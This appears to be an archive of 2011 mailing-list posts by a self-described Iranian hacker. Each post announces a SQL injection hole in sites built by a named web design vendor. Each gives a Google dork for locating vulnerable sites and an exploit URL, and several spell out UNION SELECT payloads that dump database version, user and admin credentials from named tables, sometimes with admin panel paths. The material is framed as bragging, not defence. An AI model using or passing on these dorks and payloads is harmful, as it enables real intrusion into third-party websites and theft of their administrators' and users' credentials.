###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered by DataCenterFoz

Exploite:

www.victim.com/product_cat.php?CATEGORIA_ID=[SQL]

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


LAB GRAPHIC DESIGN (index.php?categoria_id) Remote SQL injection Vulnerability

2011-08-25 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## LAB GRAPHIC DESIGN (index.php?categoria_id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered by LAB GRAPHIC DESIGN 

Exploite:

www.victim.com/index.php?categoria_id=Null Union Select @@version

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


ALTOGRADO (catalogo.php?id_categoria) Remote SQL injection Vulnerability

2011-08-19 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## ALTOGRADO (catalogo.php?id_categoria)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.altogrado.com.ar/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered by ALTOGRADO inurl:catalogo.php?id_categoria=

Exploite:

www.victim.com/catalogo.php?id_categoria=[SQL]

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


Grupo Argentina Web Remote SQL injection Vulnerability

2011-08-19 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Grupo Argentina Web
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://grupoargentinaweb.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Designed  powered by GAW GrupoArgentinaWeb 
inurl:gal_productos.php?idioma

Exploite:

www.victim.com/gal_productos.php?idioma=Ehsan_Hp200id_categoria=[SQL]


Dork : Designed  powered by GAW GrupoArgentinaWeb 
inurl:servicios_detalle.php?seid=

Exploite:

www.victim.com/servicios_detalle.php?seid=[SQL]

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


dedacom (dettaglio.php?id) Remote SQL injection Vulnerability

2011-08-17 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## dedacom (dettaglio.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.dedacom.it/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : powered by dedacom inurl:dettaglio.php?id=

Exploite:

www.victim.com/dettaglio.php?id=[SQL]

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


dpconsulenze (dettaglio.php?id) Remote SQL injection Vulnerability

2011-08-17 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## dpconsulenze (dettaglio.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.dpconsulenze.eu/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : powered by dpconsulenze inurl:dettaglio.php?id=

Exploite:

www.victim.com/sito/dettaglio.php?id=[SQL]

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


ECHO Creative Company (dettaglio.php?id) Remote SQL injection Vulnerability

2011-08-17 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## ECHO Creative Company (dettaglio.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.echocreative.it/index.htm
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered by ECHO Creative Company inurl:dettaglio.php?id=

Exploite:

www.victim.com/maglie/dettaglio.php?id=-1 union select 
1,concat(version(),0x3a,user(),database()),3,4,5,6,7,8

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


Muzedon (dettaglio.php?id) Remote SQL injection Vulnerability

2011-08-17 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Muzedon (dettaglio.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered By  Muzedon.com inurl:dettaglio.php?id=

Exploite:

www.victim.com/dettaglio.php?id=[SQL]

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
##   


netplanet (dettaglio.asp?id) Remote SQL injection Vulnerability

2011-08-17 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## netplanet (dettaglio.asp?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.netplanet.it/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered by netplanet inurl:dettaglio.asp?id=

Exploite:

www.victim.com/dettaglio.asp?id=[SQL]

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


InYourLife (dettaglio.php?id) (dettaglio_immobile.php?id) (notizia.php?id) Remote SQL injection Vulnerability

2011-08-17 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## InYourLife (dettaglio.php?id) (dettaglio_immobile.php?id) (notizia.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.inyourlife.info/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered by InYourLife inurl:dettaglio.php?id=

Exploite:

www.victim.com/dettaglio.php?id=[SQL]


Dork : Powered by InYourLife inurl:dettaglio_immobile.php?id=

Exploite:

www.victim.com/dettaglio_immobile.php?id=[SQL]


Dork : Powered by InYourLife inurl:notizia.php?id=

Exploite:

www.victim.com/notizia.php?id=[SQL]

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


lab382 (dettaglio.php?id) Remote SQL injection Vulnerability

2011-08-17 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## lab382 (dettaglio.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.lab382.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Web site by: lab382.com inurl:dettaglio.php?id=

Exploite:

www.victim.com/news/dettaglio.php?id=+9 union select 1,user_pswd,3,4,5,6,7,8 
from utenti

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


WebRising (dettaglio.asp?id) Remote SQL injection Vulnerability

2011-08-17 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## WebRising (dettaglio.asp?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.webrising.it/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : www.webrising.it inurl:dettaglio.asp?id=

Exploite:

www.victim.com/dettaglio.asp?id=[SQL]

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


Xplace Company (dettaglio.asp?id) (alloggi-dett.asp?id) (eventi.asp?id) Remote SQL injection Vulnerability

2011-08-17 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Xplace Company (dettaglio.asp?id) (alloggi-dett.asp?id) (eventi.asp?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.xplacecompany.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered by Xplace Realizzazione siti web inurl:.asp?id=

Exploite:

www.victim.com/dettaglio.asp?id=[SQL]

www.victim.com/alloggi-dett.asp?id=[SQL]

www.victim.com/eventi.asp?id=[SQL]

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


Neox (categoria.php?id) Remote SQL injection Vulnerability

2011-08-15 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Neox (categoria.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.neox.es/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : inurl:categoria.php?id= Diseño web - Málaga

Exploite:

www.victim.com/categoria.php?id=[SQL]

#
SpeCial TanX To :  Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


QOLQA (categoria.php?id) Remote SQL injection Vulnerability

2011-08-15 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## QOLQA (categoria.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.qolqa.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : QOLQA inurl:categoria.php?id=

Exploite:

www.victim.com/categoria.php?id=-10 union select 1,2,3,4,5,6 from login--

#
SpeCial TanX To :  Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


PCVmedia (free_gallery.php?cat_id) Remote SQL injection Vulnerability

2011-08-15 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## PCVmedia (free_gallery.php?cat_id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.pcvmedia.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Website designed  developed by PCVmedia.com 
inurl:free_gallery.php?cat_id=

Exploite:

www.victim.com/free_gallery.php?cat_id=-1 union select 
1,2,concat(username,0x3,password),4,5,6 from cs_admin

#

Admin Panel : www.victim.com/admin

#
SpeCial TanX To :  Dj7Xpl , Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


CdeVision(students.php?id) (gallery.php?cat) Remote SQL injection Vulnerability

2011-08-15 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## CdeVision(students.php?id) (gallery.php?cat)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.cdevision.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Site by cdeVision inurl:students.php?id=

Exploite:

www.victim.com/students.php?id=[SQL]


Dork : Site by cdeVision inurl:gallery.php?cat=

www.victim.com/gallery.php?cat=[SQL]

#
SpeCial TanX To :  Dj7Xpl , Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


DoodleIT (gallery.php?id) (about.php?id) Remote SQL injection Vulnerability

2011-08-15 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## DoodleIT (gallery.php?id) (about.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.doodleit.co.uk/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Design by DoodleIT inurl:gallery.php?id=

Exploite:

www.victim.com/gallery.php?id=[SQL]


Dork : Design by DoodleIT inurl:about.php?id=

Exploite:

www.victim.com/about.php?id=[SQL]

#
SpeCial TanX To :  Dj7Xpl , Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


BACKEND (categoria.php?id) Remote SQL injection Vulnerability

2011-08-15 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## BACKEND (categoria.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.backend.com.mx/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Desarrollado por BACKEND Diseños Web inurl:categoria.php?id=

Exploite:

www.victim.com/categoria.php?id=[SQL]

#
SpeCial TanX To :  Dj7Xpl , Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


SAY Comunicacion (producto.php?id) Remote SQL injection Vulnerability

2011-08-15 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## SAY Comunicacion (producto.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.saycomunicacion.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Diseno Web:SAY Comunicacion inurl:producto.php?id=

Exploite:

www.victim.com/producto.php?id=[SQL]

#
SpeCial TanX To :  Dj7Xpl , Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


Arte Dude (collections.php?id) (property.php?id) Remote SQL injection Vulnerability

2011-08-09 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Arte Dude (collections.php?id) (property.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.artdudegraphics.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : inurl:property.php?id= an art dude graphics design

Exploite:

www.victim.com/pages/property.php?id=-9/**/Union/**/Select/**/Null,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,Null


Dork : inurl:collections.php?id= an art dude graphics design

Exploite:

www.victim.com/pages/collections.php?id=[SQL]

#
SpeCial TanX To :  Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
##   


Web Design Sydney (news-item.php?id) (news-item.php?newsid) Remote SQL injection Vulnerability

2011-08-09 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Web Design Sydney (news-item.php?id) (news-item.php?newsid)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.milkdigital.com.au/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : web design sydney - MILK Digital inurl:news-item.php?id=

Exploite:

www.victim.com/news-item.php?id=[SQL]


Dork : web design sydney - MILK Digital inurl:news-item.php?newsid=

Exploite:

www.victim.com/news-item.php?newsid=[SQL]

#
SpeCial TanX To :  Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


Avant-Garde Technologies (display-section.php?id) Remote SQL injection Vulnerability

2011-08-09 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Avant-Garde Technologies (display-section.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.agtsindia.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered by Avant-Garde Technologies inurl:display-section.php?id=

Exploite:

www.victim.com/display-section.php?id=-1 union select 
null,concat(user(),0x3a,version(),0x3a,database()),null

#
SpeCial TanX To :  Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


Liberating IT (picture.php?gid) Remote SQL injection Vulnerability

2011-08-09 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Liberating IT (picture.php?gid)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.liberatingit.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Web Design by LiberatingIT.com inurl:picture.php?gid=

Exploite:

www.victim.com/picture.php?gid=[SQL]

#
SpeCial TanX To :  Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
##   


Amigot Corp (story.php?id) Remote SQL injection Vulnerability

2011-08-09 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Amigot Corp (story.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://amigot.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered By Amigot Corp inurl:story.php?id=

Exploite:

www.victim.com/story.php?id=[SQL]

#
SpeCial TanX To :  Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


6House Design (product_details.php?id) Remote SQL injection Vulnerability

2011-08-09 Thread ehsan_hp200

  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## 6House Design (product_details.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://sixhousedesign.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Designed By: 6House Design inurl:product_details.php?id=

Exploite:

www.victim.com/products/product_details.php?id=[SQL]

#
SpeCial TanX To :  Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
##


THE STUDIO (prod.php?id) Remote SQL injection Vulnerability

2011-08-09 Thread ehsan_hp200

  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## THE STUDIO (prod.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.thestudio.net/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Site designed by The Studio, INC. inurl:prod.php?id=

Exploite:

www.victim.com/prod.php?id=[SQL]

#
SpeCial TanX To :  Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
##


SEO New York (prod.php?id) Remote SQL injection Vulnerability

2011-08-09 Thread ehsan_hp200

  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## SEO New York (prod.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.eyesonnet.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered by:SEO New York inurl:prod.php?id

Exploite:

www.victim.com/prod.php?id=-1 union select 
1,2,3,4,concat(version(),0x3a,user(),0x3a,database()),6--

#
SpeCial TanX To :  Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


EasyContent CMS (participant.php?id) Remote SQL injection Vulnerability

2011-08-09 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## EasyContent CMS (participant.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.emmattweb.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered by EasyContent CMS inurl:participant.php?id=

Exploite:

www.victim.com/participant.php?id=[SQL]

#
SpeCial TanX To :  Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
##


Chezola Systems (display-section.php?id) Remote SQL injection Vulnerability

2011-08-09 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Chezola Systems (display-section.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://chezolasystems.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered by Chezola Systems Canada Inc

Exploite:

www.victim.com/display-section.php?id=-1992 union select 
Null,concat(admin_name,0x3a,admin_password),Null from wantiti_admin

#
SpeCial TanX To :  Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


Kimia Remote SQL injection Vulnerability

2011-08-09 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Kimia 
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.kimia.co.za/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Graphic design  Website design by Kimia inurl:id=

Exploite:

www.victim.com/image-details.php?id=[SQL]
www.victim.com/alert_article.php?id=[SQL]
www.victim.com/news-article.php?id=[SQL]
www.victim.com/gallery-list.php?id=[SQL]
www.victim.com/newsitem.php?id=[SQL]

#
SpeCial TanX To :  Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


Synchrony Infotech (product_details.php?id) Remote SQL injection Vulnerability

2011-08-09 Thread ehsan_hp200

  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Synchrony Infotech (product_details.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.synchrony.co.in/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Designed by synchrony infotech. inurl:product_details.php?id=

Exploite:

www.victim.com/product_details.php?id=[SQL]

#
SpeCial TanX To :  Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
##


XWeavers (page.asp?id) Remote SQL injection Vulnerability

2011-08-09 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## XWeavers (page.asp?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://xweavers.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : inurl:page.asp?id= Designed and Developed by XWeavers.com

Exploite:

www.victim.com/page.asp?id=[SQL]

#
SpeCial TanX To :  Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
##


Vegetav (news_item.php?id) Remote SQL injection Vulnerability

2011-07-29 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Vegetav (news_item.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.vegetav.co.uk/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : website design by Vegetav inurl:news_item.php?id=

Exploite:

www.victim.com/news_item.php?id=-1+union+select+1,user(),3,version(),5,6

#

Admin Panel :  www.victim.com/admin.php

#
SpeCial TanX To :  Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


cgcraft llc (info.php?id) (news_item.php?id) Remote SQL injection Vulnerability

2011-07-29 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## cgcraft llc (info.php?id) (news_item.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.cgcraft.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : website by cgCraft llc inurl:news_item.php?id=

Exploite:

www.victim.com/news_item.php?id=-1 union select 
1,2,username,4,5,6,7,8,pword,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from 
users


Dork : Website by cgCraft llc inurl:info.php?id=

Exploite:

www.victim.com/info.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+users--

#
SpeCial TanX To :  Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
##   


Coherendz (products.php?cat_id) Remote SQL injection Vulnerability

2011-07-28 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Coherendz (products.php?cat_id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.coherendz.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Exploite:

www.victim.com/products.php?cat_id=[SQL]


#
SpeCial TanX To :  Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


WOC Consulting (search_result.php?cid) Remote SQL injection Vulnerability

2011-07-28 Thread ehsan_hp200
 ###  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## WOC Consulting (search_result.php?cid)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.woc-consulting.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork :  Powered by WOC Consulting Canada

Exploite:

www.victim.com/search_result.php?cid=[SQL]

#
SpeCial TanX To :  Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
##   

  


Canoy Softwares (search_result.php?loc_id) Remote SQL injection Vulnerability

2011-07-28 Thread ehsan_hp200
 ###  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Canoy Softwares (search_result.php?loc_id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://canoysoft.in/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork :  Powered by Canoy Softwares inurl:search_result.php?loc_id=

Exploite:

www.victim.com/search_result.php?loc_id=[SQL]

#
SpeCial TanX To :  Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
##   

  


Zones Web Solution (status.asp?print) (search_result.php?loc_id) Remote SQL injection Vulnerabilities

2011-07-28 Thread ehsan_hp200
###  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
